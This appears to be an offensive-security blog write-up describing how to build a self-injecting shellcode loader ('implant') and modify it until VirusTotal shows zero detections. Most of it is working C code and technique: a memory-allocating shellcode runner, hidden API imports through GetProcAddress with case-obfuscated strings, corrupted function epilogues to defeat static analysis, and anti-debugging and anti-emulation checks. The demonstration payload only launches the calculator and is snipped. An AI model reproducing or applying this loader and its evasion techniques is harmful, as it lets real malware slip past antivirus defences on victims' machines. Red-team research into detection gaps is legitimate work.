Page cover image

ZeroTotal: Self-Injecting Calc

The quest to achieve an undetected self-injecting calc implant

Part One: Introduction

In this writeup, we're going to take our previous work and take it to its next logical step. We're going to take our custom calc payload, and implement it into a self-injecting implant. The goal is to once again get zero hits on VirusTotal.

Part Two: Getting Started

We begin with this code template.

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
           DWORD oldprotect = 0;
	
	//custom calc payload
	unsigned char payload[] = { 0x90, 0x48, […snip…]0xff 0x0 };
	unsigned int payload_len = sizeof(payload);
	
	// Allocate a memory buffer for payload
	exec_mem = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	// Copy payload to program memory
	RtlMoveMemory(exec_mem, payload, payload_len);
	
	// Make payload executable
	rv = VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

	printf("\nLaunch Payload?\n");
	getchar();

	// Run payload
	if ( rv != 0 ) {
			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
			WaitForSingleObject(th, -1);
	}

	return 0;
}

If we compile and run the code above we see that it works.

Part Three: Cruising with the compiler

Lets compile and test this code against VirusTotal.

It's here that my experiments showed something interesting. If we compile implant.exe with /MD instead of /MT, that is we dynamically link the executable instead of the standard malware approach of statically linking, we only get 5 hits on VirusTotal.

Another benefit to this is we have a 12kb payload, instead of a 142 kb payload.

Obviously there are going to be some differences in the import address tables, and if a target does not have all the appropriate .dlls accessible to our implant, the execution of our code will fail. But since our goal is to beat VirusTotal, we can continue to use our dynamically linked payload.

Implant_static.exe:

Implant_dynamic.exe:

There's a couple of approaches we can take now. Either we can apply some programmatic C++ level solutions or we can do as we did previously and modify the executable at an assembly level. We'll explore both.

Part Four: Lets get down to business

Now that we've settled on an approach and on the version of our executable we want to modify, lets open it up in BinaryNinja and do a little bit of reversing.

We go to our main function (you'll have to find it yourself, the names are stripped from the binary). And we start poking around.

We're going to try something a little interesting here. Every function in assembly has an epilogue, it's where the function cleans up variables and prepares to return to wherever it was called from. Now, because the main function does everything we need it to before the epilogue, and easy way to break a lot of static analysis is to corrupt the function epilogue. Lets try that and see how it goes.

Original epilogue:

New epilogue:

And our program still works.

We're down to the final three on VirusTotal!

Lets take a look at the calling conventions for Windows.

The list of registers in the scratch register column, that is rax, rcx, rdx, r8, r9, r10, and r11 are free to clobber between functions. Purposefully doing that should help break up our signature even further and maybe get is down to zero.

Ideally, what we want to do is break apart how functions get called. If we divert from the standard function calling mechanics, automated static analysis will have a hard time understanding what's actually happening in our program.

Part Five: Defeating the Huns

After awhile of doing byte level manipulations I got stuck at three. And honestly, there's no real way of getting around static analysis checking my imports at this level.

Those calls to CreateThread, VirtualAlloc, and VirtualProtect are probably what's getting us in trouble. Lets implement some WinAPI pointers to get around that.

Of note, you won't see RtlMoveMemory listed in the imports because the compiler inlined that portion of the code.

Now our code looks a little more complicated, but here it is:

#include <windows.h>
#include <stdio.h>
#include <time.h>


unsigned char sVirtualProtect[] = { 'V','i','r','t','u','a','l','P','r','o','t','e','c','t', 0x0 };
unsigned char sVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c',0x0};

typedef LPVOID (WINAPI * VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL (WINAPI * VirtualProtect_t)(LPVOID, SIZE_T, DWORD, PDWORD);

int __cdecl main(VOID) {
    
	void * exec_mem;
	BOOL rv;
	HANDLE th;
    DWORD oldprotect = 0;
	
	//function pointers
	VirtualAlloc_t VirtualAlloc_p = (VirtualAlloc_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualAlloc);
	VirtualProtect_t VirtualProtect_p = (VirtualProtect_t) GetProcAddress(GetModuleHandle((LPCSTR) "kErnEl32.DLl"), (LPCSTR) sVirtualProtect);
	
	//custom calc payload
	unsigned char payload[] = { […snip…] };
	unsigned int payload_len = sizeof(payload);
	
	// Allocate a memory buffer for payload
	exec_mem = VirtualAlloc_p(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

	// Copy payload to program memory ; this gets inlined
	RtlMoveMemory(exec_mem, payload, payload_len);
	
	// Make payload executable
	rv = VirtualProtect_p(exec_mem, payload_len, PAGE_EXECUTE_READ, &oldprotect);

	printf("\nLaunch Payload?\n");
	getchar();

	// Run payload
	if ( rv != 0 ) {
			th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
			WaitForSingleObject(th, INFINITE);
	}

	return 0;
}

If we compile it and look at our imports on PE Bear, we notice that VirtualProtect and VirtualAlloc are missing! Perfect. Lets break the main function epilogue and see how we do now.

If you're paying attention as you clobber the main() epilogue, you'll notice that the function calls to VirtualProtect and VirtualAlloc are missing, which is exactly what we want.

Lets opt for the lazy nop and see where that gets us on VirusTotal.

And then there were two:

Looking at the VirusTotal results, there are several providers that timed out. This took about 90 seconds so lets see if we can force more to time out by simply telling our program to wait at runtime.

So this time we're going to do three things:

  • Remove CreateThread() by using an API function pointer like we did for VirtualAlloc/VirtualProtect

  • Destroy the epilogue of our main() function call

  • Add a ten second sleep to try to force more AV engines to time out on VirusTotal

Looks like we're still stuck at two.

Using ThreatCheck, we get a hint of what's wrong.

Our file is failing emulation checks! We've got to figure out a way to break out of those checks. Lets apply some anti-debugging techniques.

Part Six: The force of a great typhoon

We implement a couple of techniques, and it looks like we might be good!

BOOL  bDebuggerPresent;
CheckRemoteDebuggerPresent(GetCurrentProcess(), &bDebuggerPresent);
__analysis_noreturn int FatalExit(1);
DebugActiveProcessStop(GetCurrentProcessId());
if (!(IsDebuggerPresent() || bDebuggerPresent)){[…snip…]

And then there was one...

There's one more anti-debugging trick that's worth a try. And honestly at this point we can abandon the lower level executable manipulations, they were successful for some intermediate level detection algorithm's, but the debugging checks get us passed that without the need to clobber the main() function epilogue.

Lets add this check and see if we can get 0:

int i = 1000000;
int n = 0;
char * buffer;
buffer = (char*) malloc (i+1);

for (n=0; n<i; n++)
  buffer[n]=rand()%26+'a';
buffer[i]='\0';

if (buffer==NULL) 
	exit (1);
	
free (buffer);

Part Seven: ???

[Intentionally left blank]

Part Eight: Profit

A second attempt validates that we can get rid of the long sleep() when deploying our payload too!

After a little bit more tweaking to our code for readability, we succeed once more!

Part Nine: Conclusion

In this writeup we saw the effects various techniques has on our implant's detectability and functionality. Low-level opcode manipulations gave us an advantage over some forms of static analysis, but the payoff-to-work ratio made pursuing programmatic manipulations more worthwhile. We also saw that sleep manipulation was not particularly effective in this case.

Additionally, it's important to note that we spent most of our time working with a dynamically compiled payload, and as such there's going to be limitations on the types of targets that this specific set of methodologies will work against.

Ultimately, we were able to quickly and rather simply overcome a significant detection challenge by simply using WinAPI pointers and some pretty basic debugging checks. Next time, we'll use this as a jumping off point as we work to achieve a 0-total for a static implant.

References:

Last updated